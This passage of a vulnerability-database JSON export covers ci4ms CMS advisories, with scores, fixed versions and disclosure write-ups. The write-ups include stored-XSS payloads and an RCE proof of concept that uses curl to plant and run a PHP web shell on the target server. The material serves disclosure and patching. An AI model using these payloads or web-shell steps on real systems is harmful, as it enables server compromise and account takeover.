"https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:58:43Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34560", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34560" }, { "reference_url": "https://github.com/advisories/GHSA-r4v5-rwr2-q7r4", "reference_id": "GHSA-r4v5-rwr2-q7r4", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r4v5-rwr2-q7r4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34560", "GHSA-r4v5-rwr2-q7r4" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4qss-f4ym-bbeh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89851?format=api", "vulnerability_id": "VCID-6nzs-j8gz-9ucu", "summary": "CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS\nAn attacker can acheive Full Account Takeover & Privilege Escalation via Stored DOM Blind XSS on public-facing landing pages through the System Settings Company Information section which allows the injection of XSS payloads", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35035", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05914", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05863", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05907", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05906", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35035" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.2.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-5ghq-42rg-769x", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:46:26Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-5ghq-42rg-769x" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35035", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35035" }, { "reference_url": "https://github.com/advisories/GHSA-5ghq-42rg-769x", "reference_id": "GHSA-5ghq-42rg-769x", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5ghq-42rg-769x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126169?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/1011698?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/111070?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.2%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.2%252B0" } ], "aliases": [ "CVE-2026-35035", "GHSA-5ghq-42rg-769x" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6nzs-j8gz-9ucu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91345?format=api", "vulnerability_id": "VCID-7eme-yx6r-63ad", "summary": "ci4-cms-erp/ci4ms: System Settings (Mail Settings) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via System Settings – Mail Settings (Same-Page Attribute Breakout & Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Mail Settings Configuration Fields\n\n### Description\nThe application fails to properly sanitize user-controlled input within **System Settings – Mail Settings**. Several configuration fields, including **Mail Server, Mail Port, Email Address, Email Password, Mail Protocol, and TLS settings**, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding.\n\nUnlike public-facing XSS that executes on landing pages, this vulnerability executes immediately on the same settings page. The injected payload breaks out of the HTML attribute context and is interpreted by the browser when rendered, resulting in same-page DOM-based XSS.\n\nThis represents different functionality and a separate vulnerability from landing-page injection.\n\n### Example Affected Fields\n- Mail Server: `test`\n- Mail Port: `465`\n- Email Address: `simple@gmail.com`\n- Email Password: (any input)\n- Mail Protocol: `SMTP`\n- Domain: `simple@domain.com`\n\n### Affected Functionality\n- System Settings – Mail Settings configuration\n- Same-page rendering of user-controlled input fields\n- DOM attribute injection within form inputs\n- Storage and retrieval of mail configuration values\n\n### Attack Scenario\n- An attacker injects a malicious JavaScript payload into one or more Mail Settings fields.\n- The payload breaks out of the HTML attribute context.\n- The application stores and re-renders the payload without sanitization or encoding.\n- The payload executes immediately on the same settings page.\n- The script executes in the browser context of the authenticated user managing Mail Settings.\n\n### Impact\n- Persistent Stored XSS\n- Immediate Same-Page DOM XSS execution\n- Execution of arbitrary JavaScript in victims’ browsers\n- Administrative privilege escalation\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire platform\n\nEndpoints:\n- `/backend/settings/` (Mail Settings)\n\n## Steps To Reproduce (POC)\n1. Navigate to System Settings -> Mail Settings\n2. Insert the following XSS payload into any Mail Settings field:\n`test\"><img src=1 onerror=alert()>\" class=\"form-control\" placeholder=\"Name\" required>`\n3. Save the settings\n4. Observe that the payload breaks out of the input attribute context\n5. The XSS executes immediately on the same page\n\n## Remediation\n- Never use .html() or any innerHTML-style sinks for user-controlled input in PHP or JavaScript.\n- Apply proper **HTML encoding and input sanitization** for all configuration fields.\n- Enforce CSP, HttpOnly, SameSite, and Secure flags for cookies to reduce the severity of XSS and potential CSRF escalation.\n- Audit all other system settings fields for similar attribute injection vulnerabilities.\n\n# Ready Video POC:\nhttps://mega.nz/file/KRNhUI6Q#NGC3Bow3RlnmdU1H2bGu1BGbpfIc-awi6IlvTp08V1s", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27599", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10016", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10421", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10507", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10545", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27599" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-66m2-v9v9-95c3", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:08:02Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-66m2-v9v9-95c3" }, { "reference_url": "https://mega.nz/file/KRNhUI6Q#NGC3Bow3RlnmdU1H2bGu1BGbpfIc-awi6IlvTp08V1s", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://mega.nz/file/KRNhUI6Q#NGC3Bow3RlnmdU1H2bGu1BGbpfIc-awi6IlvTp08V1s" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27599", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27599" }, { "reference_url": "https://github.com/advisories/GHSA-66m2-v9v9-95c3", "reference_id": "GHSA-66m2-v9v9-95c3", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-66m2-v9v9-95c3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-27599", "GHSA-66m2-v9v9-95c3" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7eme-yx6r-63ad" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89003?format=api", "vulnerability_id": "VCID-8hmq-7f3h-fyfw", "summary": "CI4MS: Blogs Posts (Categories) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n# Summary \n### **Vulnerability: Blogs Posts (Categories) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS**\n- Stored Cross-Site Scripting via Unsanitized Blog Post Content in Blog Management (Categories)\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog posts within the **Categories** section. An attacker can inject a malicious JavaScript payload into the **Categories** content, which is then stored server-side.\n\nThis stored payload is later rendered unsafely when the **Categories** are viewed via blog posts, without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog post **Categories** creation functionality\n- Blog post **Categories** editing functionality\n- Blog post **Categories** storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog post **Category** to include a malicious XSS payload in the category description or name.\n- The application stores this content without sanitization or encoding.\n- The payload persists and executes whenever the category is viewed within the blog posts section, leading to the execution of arbitrary JavaScript in the victim’s browser.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users within the **Categories** functionality\n- Full administrator account takeover through **Categories** access\n- Full account takeover across all roles via **Categories** pages\n- Full compromise of the entire application via XSS in **Categories**\n\n**Endpoints:**\n- `/backend/blogs/create` (Categories specific)\n- `/backend/blogs/` (Categories view)\n- `/blog/{id}` (Rendered blog post under Categories)\n\n## Steps To Reproduce (POC)\n1. Go to the **Categories** section of the blog management panel.\n2. Create a new category or edit an existing category.\n3. Insert an XSS payload into the category content, such as:\n`<img src=x onerror=alert(document.domain)>`\n4. Save or publish the Categories.\n5. View the category via the blog posts in the administrative panel or public blog page under the Categories section.\n6. Notice the XSS payload executing automatically when the Category is viewed in the Blog Posts.\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/SAdVxK7b#kFW_sFOim_d_1AnVcpwvzOEV4MHv33LLooL4Xa_Ymgg", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34567", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15923", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15872", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15912", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18292", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34567" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r33w-c82v-x5v7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r33w-c82v-x5v7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34567", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34567" }, { "reference_url": "https://github.com/advisories/GHSA-r33w-c82v-x5v7", "reference_id": "GHSA-r33w-c82v-x5v7", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r33w-c82v-x5v7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34567", "GHSA-r33w-c82v-x5v7" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8hmq-7f3h-fyfw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49915?format=api", "vulnerability_id": "VCID-8j49-k5yj-3kes", "summary": "CI4MS Vulnerable to Remote Code Execution (RCE) via Arbitrary File Creation and Save in File Editor\n**Summary**\n\nA critical vulnerability has been identified in CI4MS that allows an authenticated user with file editor permissions to achieve Remote Code Execution (RCE). By leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server.\n\n**Vulnerability Details**\n\nThe vulnerability exists in the /backend/fileeditor/createFile and /backend/fileeditor/save API endpoints.\n\nUnrestricted File Creation: The createFile endpoint allows users to create files with any extension (including .php) in web-accessible directories such as /public.\n\nArbitrary Content Injection: The save endpoint allows users to write arbitrary content into the created files without sufficient server-side validation or sanitization.\n\nAn attacker can combine these two flaws to create a PHP webshell and execute system-level commands, leading to a complete compromise of the web server.\n\n**Impact**\n\nSuccessful exploitation allows:\n\nFull access to the server's file system and databases.\n\nExecution of arbitrary OS commands.\n\nPermanent modification or deletion of application data.\n\nSteps to Reproduce\n\nLog in to an account with permissions to use the file editor.\n\nCreate a new PHP file in a public directory using the following request:\n\n```\ncurl -X POST '[SERVER_URL]/backend/fileeditor/createFile' -d 'path=/public' -d 'name=exploit.php'\n```\n\nInject a PHP payload into the file using the save endpoint:\n\n```\ncurl -X POST '[SERVER_URL]/backend/fileeditor/save' -H 'Content-Type: application/json' -d '{\"path\":\"/public/exploit.php\",\"content\":\"<?php echo shell_exec($_GET[\\\"cmd\\\"]); ?>\"}'\n```\n\nAccess the file via the browser to execute commands: https://[SERVER_URL]/exploit.php?cmd=whoami\n\nSuggested Mitigation\n\nPath Validation: Restrict file operations to non-executable directories.\n\nExtension `Whitelist`ing: Strictly allow only safe file extensions (e.g., .css, .js, .txt) and block executable extensions like .php, .phtml, etc.\n\nContent Sanitization: Implement server-side checks to prevent the injection of malicious code patterns.\n\nExecution Prevention: Disable PHP execution in public/upload directories via server configuration (e.g., .htaccess or Nginx config).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25510", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00183", "scoring_system": "epss", "scoring_elements": "0.39785", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00183", "scoring_system": "epss", "scoring_elements": "0.39812", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00183", "scoring_system": "epss", "scoring_elements": "0.39838", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00183", "scoring_system": "epss", "scoring_elements": "0.39835", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25510" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653", "reference_id": "", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-04T16:28:51Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25510", "reference_id": "CVE-2026-25510", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25510" }, { "reference_url": "https://github.com/advisories/GHSA-gp56-f67f-m4px", "reference_id": "GHSA-gp56-f67f-m4px", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gp56-f67f-m4px" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px", "reference_id": "GHSA-gp56-f67f-m4px", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-04T16:28:51Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73772?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.28.5%2B0", 